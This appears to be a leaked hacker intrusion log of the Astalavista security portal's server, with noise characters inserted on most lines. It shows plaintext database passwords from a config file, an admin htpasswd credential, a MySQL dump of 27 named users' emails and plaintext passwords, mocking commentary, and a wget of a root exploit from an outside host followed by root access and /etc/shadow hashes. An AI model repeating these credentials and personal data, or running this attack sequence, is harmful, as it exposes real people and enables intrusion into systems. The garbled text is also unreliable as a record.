! V/ k: F5 B3 \0 @drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend* z8 [4 X5 Q e0 R0 j
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
4 f8 ^2 S' L: d-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
( q% Y/ N/ X- W$ A; s pdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config/ ?5 V8 ?6 P# C% T0 K
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron3 [. X; A. Z; k- u0 a
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd& i# V/ A& y. @' m) U7 |3 u5 g# ~
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php9 Y% @8 ~! s, `" H, B+ H$ _
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico/ s( p7 A+ M2 ?* Z
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
2 Y5 L* q& O* V" q" p; j6 A4 Zdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
' `* j3 y" |0 a3 e8 w( H# Z-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
- {2 Z8 m) K* d-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
- ~$ K1 n- _; c; v; P4 Z; g-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
/ M' O" _! n, |. K, {-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
* _" F5 U: y/ [- l- x: {-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
/ i' u4 Y; T6 w. i- b-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
7 Z m$ U7 {, N# t/ G-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
" ?3 r. J0 F# @4 `- qdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc# ?: {5 t/ H! ~4 R3 w( ~7 J2 `
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang5 F: u/ o! }& `$ {: r8 T6 j2 W
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
8 @- a* r7 N, w+ P6 o6 B3 j) Vdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
: P5 \3 C) x! k9 Ddrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
$ c# y l* s8 @; ]$ [% ydrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata; N P/ ?2 g: h" Q4 ]4 @' S
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
% { z, a9 E! j8 I1 }, {-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
# \. a. P$ r2 W @* I) xdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
/ q( [; \. a. o* K-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
. V; @& t0 d' h2 [: hdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss [! d6 r* _' ^+ P- I( `' m
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources6 }8 m7 x+ A. C' }, ]1 {
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
3 T: J" I7 g5 M. Hdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes4 m2 R& d* A4 A! ~3 }, o
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
1 {' Y8 ^/ M/ @ V5 Mdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
& P4 R: Q' i9 D& T2 M' Ndrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2: _' A* Y7 v! m9 X
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
) T, M4 O" e" H% h-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
/ C4 D# V# D- Idrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
0 z9 J/ i0 v6 t8 S7 Y4 f; a8 i1 f* L; z( e9 M4 P, [) e3 ]
sh-3.2$ head -20 index.php
8 d( b* z4 K8 ^5 C* C<?PHP
e; F; A7 Z0 r! o; U* Z+ F/**# C- C' L% H2 y& L% H& a4 o$ Z
* Mainfile (external) for astalavistaNET v2.0
0 V# j4 J% q8 @. C9 A: Z*: Y, V& h/ ?# E
* @copyright Astalavista IT Engineering GmbH! h8 F( s! Y2 O, w( k6 Z! m. A O
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
( N! _3 e) |1 D! E2 _; ?7 b5 O* @version 1.01 J0 ]; i( F: @- i3 v9 d8 t' W
*/" J* g1 M( S. c' E& x) K
! H1 p( l$ d& @5 h3 u: ? if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {9 B' S) R$ y- a% g
$dontStartSession = false;# |% R ?; u- e( _
} else {
2 _( M2 r1 Z+ f. j$ e3 c $dontStartSession = true;0 ~* l; v0 J1 Q4 t/ ?; k g! B9 {
}
: a( N" G: I* }1 v0 _1 {6 U require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
6 B3 h# [$ G8 @' ] require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
- e5 i" e( y/ g9 N" N; ?* z# ? require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
) n, e- ?) S& R: u require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
: W( h& Y; T5 ]% n7 e) Q, b7 u8 j! M1 S: p, _
sh-3.2$ cd config
: q2 H/ y; D& y6 P& esh-3.2$ ls -la
W! U1 F G! X9 utotal 32# P) ^3 S C: b+ i1 q6 E
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .2 d) t0 A( Q0 n; }8 x
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ W6 F$ ~6 [, J/ i9 r1 k. l7 P" w
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
3 y, ]3 r) r9 N; F* e- F-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php1 z( N" I2 P+ S! k" f4 X
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php! e- f# M; R6 ^! x9 w: P( M6 A
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
- V4 d7 o. @- b6 `-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
( h {' b* ]0 A; |
$ D8 _& l7 M, P- f9 ~" Esh-3.2$ cat com.conf.php1 Z# C U5 B9 D, ~& O6 ?1 [' |
[snip]4 b9 U3 c( |: U6 o; a' U
//member-database$ y' T$ z+ z5 {9 h
$_CONFIG['db_mem_server'] = ‘localhost’;
4 }; ~+ t7 \) ^6 e( o. k8 [$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
4 j* @2 w0 C7 P1 R: R$_CONFIG['db_mem_user'] = ‘astanet_db’;
" m; o: ^# r5 K) ?# \: D0 X( d$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
: O, J8 d! Q( f4 ?$_CONFIG['db_mem_debug'] = false; //true or false
4 ~; C# v/ _3 p//ads-database
! G0 ~# E8 g5 i. z9 h7 g$_CONFIG['db_ads_server'] = ‘localhost’;/ j/ x) E+ R/ x
$_CONFIG['db_ads_database'] = ‘astanet_ads’; |/ `" q5 j& C) F
$_CONFIG['db_ads_user'] = ‘astanet_db’;
$ m3 ?( U% U) h3 h# s; x$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
7 [' X9 C& F7 f$_CONFIG['db_ads_debug'] = false; //true or false
- z t0 a- G/ }, D& i' W M( Y/ c' X//rainbow-database
. c* a+ S; D4 L7 B6 N$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;# P! Q7 R& H7 j+ V& V: S3 U! E/ g" ]
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
7 S& O1 F4 f4 S% p1 L: p/ u# S$_CONFIG['db_rainbow_user'] = ‘dinu’;; Q8 n, p% r5 s, n) L
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
$ @) _! c& U8 s$_CONFIG['db_rainbow_debug'] = false; //true or false1 V0 R4 d! i/ d/ D& C
//mailing lists database+ t: \1 [6 l8 I' p( h
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
4 k8 q0 `) m1 Q8 i$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
+ X+ I7 C+ S$ U1 E3 s$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;5 c( @: Q; s" Z* g' u
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;: i+ ?/ s6 ]+ l0 u; V5 a
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
`0 s$ }! e9 u- c# B//paypal
' J8 Q/ h1 y1 ?8 Q$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;4 X. f9 }3 r. K9 M/ ]5 S
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
( R5 {7 n! N) d$ Y6 t+ @3 b$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;; J1 _0 w2 O0 I9 Y& R' a# X
$_CONFIG['sub_pp_noship'] = ‘1′;
6 g% E. q& ]# ^$ \$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
, C. K- C0 _' x3 B- N4 B2 p: L[snip]
8 E R# G$ K, G
# b4 k$ O! X0 W/ j/ {- W1 Rsh-3.2$ cd .." F- X9 H8 y. j1 D6 t. D
sh-3.2$ cd member5 G- A; m2 V8 z' D& F! ^
sh-3.2$ ls -la! G$ m$ ]4 N# ?! f6 [* B
total 20
9 W$ J8 D b! c. Vdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
( J) @% [! ^2 f6 k. kdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
( a, m) c1 o) q/ T3 C7 |) X-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
' _! C* Q3 E% H0 G7 o-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php5 L1 b7 M6 o% l. {# r
sh-3.2$ cat .htaccess1 F$ S% F* J% f3 A s) Y. d
SecFilterEngine off
% A* `0 h# r4 |" y, S4 v* e. ^/ o) C A. \/ T* W: @3 V
sh-3.2$ cd ..; u# ]' u) z; S$ i/ m" M! `" f
sh-3.2$ cd cron/ _/ I+ I. z+ u# D2 [5 B
sh-3.2$ ls -la
& t ]! X8 {0 u8 t) Utotal 168
2 H% F0 T& ?$ g/ v/ Odrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
c5 B3 b# w) r: P- n3 U2 _) [) adrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ ~# v. P6 z8 i, @
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php7 ]- l$ w+ [% g1 j+ T. B3 u y) H( E
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
/ Z/ N3 D) F' f" L8 `/ Y$ m-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php6 m* \3 P0 o3 W) P% g4 m* K
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
3 |9 j: w, d! Z" L-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php) A! N6 f9 t! V4 y
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php0 Q* v S# q% m
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php$ T4 U5 q, x( A+ A" ?
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php( Q' ~& r- E( h4 t
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh1 P2 C* U& I1 @/ Q$ J9 W/ Z
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
2 O# |6 o. l* @7 p- ~0 d1 u {-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
4 n @2 K# ^' ]-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
) I( c5 b1 M/ K5 Z-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh* K; h2 q4 z! D& _2 ^& @$ g
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php7 e9 e' @" x1 E7 e7 T* P
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php* H% c1 o! u* {, u1 a; Z6 U
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
9 j8 O; x4 e, [! O3 _-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php, }' C; f* J5 W. g3 {
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php( z8 j7 ]' L! s
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
9 B2 z3 g- J W3 c' n% A/ L-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
$ e$ ]& e6 x( O$ `4 c0 [/ I-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php' j, N% |) R' {+ t" U) I& U- i
/ L6 z& Y% t9 y2 e6 x( y8 e
sh-3.2$ cd ..# \5 h$ y! o) F( P
sh-3.2$ cd _0077 B) t3 z9 _( O* F
sh-3.2$ ls -la
4 M) V8 u4 h% Z1 t; e& O. dtotal 243 F" l$ Z: X# ^" V
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
% _$ `/ u/ ~5 D9 `5 H2 N# B- Vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
4 A7 V& H) b, `/ `( K+ I8 F-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
7 s: H' X; n& ~) S/ l-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
& U5 x5 v: a; O-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
' H6 j" @2 t' ]: H/ J) Vdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap* L7 a9 j' ?5 P1 q
, j7 Y+ X( H7 k) |" n) d7 j
sh-3.2$ cat .htaccess
! B$ c1 b8 u- R1 w& u I3 sauthType Basic
1 x, B# |2 e" E5 qauthName Admin0 q9 w% |" A1 f3 a n) j& }( `
authUserFile /home/astanet/auth/.htadm_pwd% v/ T. s4 E* x* H. w0 Y/ K
require valid-user+ R( q# P; R$ F" p1 [3 X1 @2 u
& l3 q& [& O' xsh-3.2$ cat /home/astanet/auth/.htadm_pwd. h, v ~/ T1 z" f( R8 v4 R B& X
admin2net:CR0bl65MwhfT7 S- z# W0 q9 O, \
3 }4 R% L' n5 @1 y1 K1 `# e1 qsh-3.2$ mysql -u astanet_db -p
% L; u9 ?( D8 pEnter password:4 s" U- x, x0 L6 E$ D9 P& O8 ^9 [
Welcome to the MySQL monitor. Commands end with ; or \g.
# b/ v8 d: o& ^9 K- J7 o: y# n" OYour MySQL connection id is 275153) U& H/ {: |* m3 w$ @/ f
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
1 @1 x0 q. U5 } b1 G0 d& P$ Z' Y. w* `0 t1 o; H* @5 T2 P# p
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- X4 n2 b/ Y( f; x: G; z; m4 r- l/ W" r d2 i
mysql> show databases;
0 L3 ^2 g( n' Z# i# j1 Y" h$ o+———————–+1 x t; { J$ {
| Database |7 e% k! e2 h y$ B) v# z( M
+———————–+
7 I( }7 D& ^' d4 z4 c7 U| information_schema |
9 u% A9 z" [9 t$ m7 v, o3 s/ I| astanet_ads |9 w) u1 ?( f3 L& @) S" v% |
| astanet_mailing_lists | J# ~. a y) V% c6 K( a
| astanet_mediawiki |
8 e# q* U* W- Y+ L4 K| astanet_membersystem |8 b, @+ F9 X) `% X: r k! i; F
| test |
* u" q5 [4 b$ {/ ?/ D+———————–+
0 D1 p6 a5 I' v4 O- O* @+ V1 M l6 rows in set (0.00 sec)
* p1 ]; Q2 n! |7 n3 j% y, B B0 _6 }7 i7 e# o8 b" m$ c5 y
mysql> use astanet_membersystem
6 h- o0 [2 s- f4 Z: v3 jDatabase changed
% o: f: F6 v5 a4 Dmysql> show tables;
; y7 T. |# M1 Q$ }5 Z+ l# X3 B2 y6 ?8 ?+———————————–+- K& h' p0 n, @
| Tables_in_astanet_membersystem |
; G& P8 E8 H/ u& V+———————————–+
$ P! B3 l, _$ j I| blacklist_categories |8 a5 B, i$ F4 c
| blacklist_content |
! c! n% ] {1 [ D0 A9 w| blacklist_levels |/ s& f( X5 z1 x% g( M$ |
| blacklist_mcset |, D9 ]" f) Z7 a2 V
| dir_categories |6 C5 u% [" a/ L1 W) @
| dir_comments |
7 P( ~% I$ I2 G- T6 J2 [% r| dir_links |' Q/ U- \& M% d4 n9 A
| dir_temp |- q* E5 t1 G) s; F/ X0 `
| dir_votes |& ?5 S' ^* ]7 s1 O$ ~/ k: I
| documents |( Y& @% R3 o3 U3 T. |/ u: [5 R
| documents_categories |1 n- Q. x4 r* K) s
| email_content |( V. N3 v$ T, w
| email_settings |4 B E3 M# C2 N( L
| exploits |
2 j+ S5 T9 N5 ~1 e- h$ f- k; b| exploits_categories |0 Y5 o ^; Z; w. S5 I2 `; T
| exploittree_categories |5 K* l) w" g |1 u. ^# r
| exploittree_exploits |) n& G2 N+ ]; l7 r7 u) P9 k
| home_values |
& |) c3 @3 d6 E# J7 k| iso_countries |
5 f4 T$ r" R" f/ q1 w| links_categories |4 `0 i3 F/ n: P( R. } y5 X- x7 ]$ B
| links_records |- r- x* N6 S: j
| links_unauth |& T: m2 b$ E R1 u$ z, K! r
| links_votes |5 s! E! ]. s$ t r Q- d" k
| log |3 x( R% _( `9 P% x* B( \
| news_categories |, p {4 z3 I }* R
| news_comments | W! }. F5 o/ a1 S* T/ e% J( ~3 D( g- V1 u
| news_emoticons |
& r" t7 z: w5 D" ~! K. k| news_latest |
: l+ c( u5 h7 \% e- k+ ?| news_messages |
6 {. m- J& o U: K* i% _9 [: l7 D| news_statistics |
4 v- |8 _: P6 y' k| news_votes |+ y* W/ Q$ L3 y% D, v* J
| prices_content |
* d: |; a |! ~9 f| prices_offers |' Y3 j* C. Y5 G7 A- t l
| rss_settings |- K; M+ p8 B9 N# ^2 Q
| sessions |4 k1 S8 J( m* r9 J6 r
| stats_signups |
+ t7 E- U0 d4 L* n| u2u2 |
4 Z7 ]( h3 l9 [/ ^6 S! }# m| u2u_contact |1 V* P7 _: o3 B
| u2u_settings |
, @9 |: G) i$ n( |' g! X| user_keywords_selected_categories |9 Q, J, X: F" l
| users |! W' A: v- w1 F3 Y
| users_ipn_test |
$ S+ F* u4 q. m- N: Q| users_keyword_values |
" \, ^- f2 {$ S7 G8 ?| users_profile |
7 d+ O; _+ @% h* z| users_temp |9 O# s7 P! _+ r& |) |
| users_upgrade |
. e( y/ b* `9 u% J! l' k8 k0 z+———————————–+
; T# L3 V. x: C5 G2 S1 L46 rows in set (0.00 sec)
; F$ p! u! N9 p( [
6 i1 O, M- c1 a& R+ q) cmysql> describe users;
4 k- [! K2 t d1 H' \+————————–+————————————–+——+—–+———————+—————-+
1 v, x& L" L+ j* p0 P9 m| Field | Type | Null | Key | Default | Extra |
7 P4 a7 j4 [2 T% n- T6 i+————————–+————————————–+——+—–+———————+—————-+
9 o5 d7 k$ ?5 ^0 t& |) H7 B| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |9 o# K" r: P/ Z- t
| user | varchar(50) | NO | | | |
- M( k9 x, F3 l: e9 b- ~$ `| nickname | varchar(30) | NO | MUL | anonymous | |
# X' m) r. D4 L1 o) z F| password | varchar(30) | NO | | | |$ y, ~8 e4 n) \8 U, F
| userlevel | tinyint(3) | YES | MUL | NULL | | ?% U% ?0 B! o; Y" s# {1 O
| exp | int(8) unsigned | NO | | 0 | |% i4 n/ a9 g# i/ k3 R( B
| email | varchar(50) | NO | | | |" j5 G1 Q0 }0 W: T- }
| ip | varchar(15) | NO | | 0 | |
* ~6 d6 @3 {" @$ q| proxy | set(’0′,’1′) | NO | | 0 | |+ |" x! Q: w& {6 y M: W3 F: ]
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
7 b6 W2 d- A8 }) y; k% X# v* `| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
& m% s' r1 `3 `| anz_in | tinyint(1) | NO | | -1 | |
7 N( ~; P6 N0 p0 k| status | tinyint(1) unsigned | NO | | 0 | |# `, y; e4 Z4 z
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
- @% z6 g! \7 T; e| freemember | set(’0′,’1′) | NO | | 0 | |" j5 u, ]6 F* K1 E; j) [- Z% R
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
, P- ^6 \- u8 Z* L+ t5 M+ u| lang | tinytext | NO | | | |9 d$ o0 d2 c* r0 _; k g2 P- t
| adid | smallint(6) | NO | | 0 | |
/ g/ [, h2 g7 n+ ?8 w& S7 o| pp_txn_id | varchar(255) | YES | | NULL | |$ p6 z: O' V, X0 n0 F" |
| cnb_transaction_id | varchar(255) | YES | | NULL | |+ y2 Y7 N5 u5 o* e
| cnb_order_id | varchar(255) | YES | | NULL | |
: v/ n9 D3 K! z$ F+ w. [| cnb_user_id | int(11) | YES | | 0 | |
* J. j8 d! k! ~( ^3 O+————————–+————————————–+——+—–+———————+—————-+
1 e5 w! f: J. Q6 [+ N# Z1 R22 rows in set (0.01 sec)
4 Q) ?2 g2 `* |" K8 R* m' h# ]! x- s9 [8 W0 z; D' x
mysql> select count(*) as skids from users;
; X( a9 w8 V ?9 }! i6 ?+——-+
* P1 G# C$ o( |7 \| skids |
5 s; J6 D% j+ x: |% C+——-+
; Q: W8 S$ k2 u& U5 J| 25199 |
( n- J6 J- X+ W# i+——-+% Y3 o" F' g' X0 W
1 row in set (0.00 sec)0 f: X$ J/ A- I( k
/ B" e$ S* k6 L; v# }' h) z
mysql> select user,nickname,password,email from users where userlevel = 1;
7 J0 } C) ~' t/ f4 f; M( C& Y3 ]+————————–+———————-+——————+———————————–+
2 u- X! C' F, Y% f! h# s| user | nickname | password | email |+ Q7 G6 }# l ?$ R
+————————–+———————-+——————+———————————–+
/ M6 |7 ]4 R I5 s8 p) S! j9 g! {| pascal | prozac | astaman3 | 链接标记info@astalavista.net |6 A5 L3 r$ v) g/ N
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
# r! e) V3 t7 H) o) R: f| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
; s8 ]& r# A, K7 @% |$ E: e| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
* D! m. p# D3 x) v: u| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |% x1 B- d7 @) E0 Z/ ^& a) s j* K
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
# z- ^' K6 w" }% a% K! F" [6 s| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |7 S3 p6 p6 D5 E2 A7 M; h/ e
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |; J1 c* r/ n% V
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |5 g$ k7 X0 |. J1 N
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
& z: O+ A2 P+ }( S8 I+ D* o0 R| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |2 H" ]: N0 r7 x# ~6 o: n* e' r9 S
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
9 }, H- `$ X: N8 |$ {" `' K| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |; L" @, U% `$ A _
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
/ y5 C) E$ {7 W: n8 X4 g1 z( v, x| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |, A) m3 o+ V# E
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
6 h3 T) K$ h3 ]5 n* v* I3 B4 c3 \7 x, Y| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
" a6 k& e) `, E c4 [% a$ q$ d| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |, V5 L r1 m, [, n& ^
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |. w1 _8 H( d( g' r# {
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |/ V+ r1 r: \" _& E* T/ Q# H- B
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
. B7 ` N, [9 z# T" i; Z0 x| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |& i1 v. R# K: I W4 \2 Y+ a9 g: B
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
3 q% }0 R% Q& u& X| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
" `! i7 s5 w {0 }' M# n3 l| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
) q0 |7 @/ f- ]/ H+ \& s; D| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
L4 M( ?1 \0 v9 C2 {5 p| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
* _' A3 q( k) t, p) P& D+————————–+———————-+——————+———————————–+
3 x# C. T: S q U4 r9 p27 rows in set (0.00 sec)
* |5 C. ]7 f& j. ^" O7 z8 M
+ o2 n, f ]7 g5 W& N+ tmysql> exit;6 \5 U+ R$ `' l0 c5 j. _* x
Bye
, n5 Q4 M! ]/ N4 B' C! s
2 z6 d9 E9 L3 f/ ?[~] plaintext passwords? yes,
) u" `* g+ c: P8 d- d p' N. uThose so called “security professionals” who charge you $6.66 / month to
# d9 N, w6 R' l4 K, Rregister at their hack-proof portal, save your passwords in plaintext…5 `# f4 ] n! K! Z% Z
brilliant!
- v: u" A$ b& ]* }6 @, x# \% o! U8 S
[~] This been fun but we want more.) k1 ^' `+ ^: d8 G/ G% @
: T% C0 `5 X" e) X& `$ csh-3.2$ uname -a
' ~# Q2 s5 G% t- Z0 NLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux$ F. V2 B+ D4 Q6 C' h9 g3 [
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]- g8 V& R0 w, K% o
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]( l/ G T3 h h/ r) L
Resolving anti.sec.labs… 13.33.33.37
) Z9 C1 D$ o* B G. w& ZConnecting to anti.sec.labs|13.33.33.37|:80… connected.
6 T- G9 |8 B6 }* {7 V( mHTTP request sent, awaiting response… 200 OK
. p$ g4 D1 T+ `8 b8 G9 B* P- VLength: 18200 (18K) [text/plain]
. A* o" Y2 i/ s& T5 j3 `7 W9 YSaving to: `g0troot’
( y- U5 |1 ]% g% j" C* r& s" ]% B% m3 K6 _4 o8 b
100%[=========================================================================================================================================>] 18,200 58.6K/s in
8 ]* ~; k/ D% n7 }1 u: \- G0.3s
) p. E9 J8 `. a/ |9 ^
- ^$ C! @8 B; N! i8 R18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
( s7 I; o% q8 M2 O; S w2 K" j8 I/ N+ p+ @7 c( B8 |
sh-3.2$ ./g0troot -i x86_64
* {* ]" m, }- G4 h8 c[+] g0troot - anti.sec.labs
# }) P* [) x, l7 \, ^/ D" P[+] Target: 2.6.18-128.1.10.el5
) ?! R7 O2 _- W" S- I+ }# _/ w* |[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
8 T# S# A9 j* O# ?
* h$ F P$ n+ ~5 s2 ]0 Q& {[+] r00tr00t
2 E* W$ O. j2 |8 F[~] Executing shell…
M6 x6 g, S- H# J) I+ {* K" m6 a5 w
! \: X( Q4 E6 \% e3 Esh-3.2# id+ R& z, m2 G5 Z r( W" v: |
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
6 F8 W7 V3 s% ^" V& \- L* D/ R; n2 X
sh-3.2# cat /etc/shadow
) V# q; X8 s5 u% d$ rroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
5 m4 s$ l) s* f[snip]$ U1 ?! x# m+ M8 e% @1 O
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
+ C8 u! G: p) l& I8 g; y$ Ajon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
' l2 s' A% @+ H0 ~4 w! Scom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
( ?& d3 I2 ~6 t/ q2 D2 xastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::/ [/ b! u+ Z7 t: h, ?
! j3 @' M: ]4 ^6 j! o/ n P
sh-3.2# cat /etc/motd
( ^. l( ?) s! }+ H3 E! w0 ]8 K: T5 I#####################################################
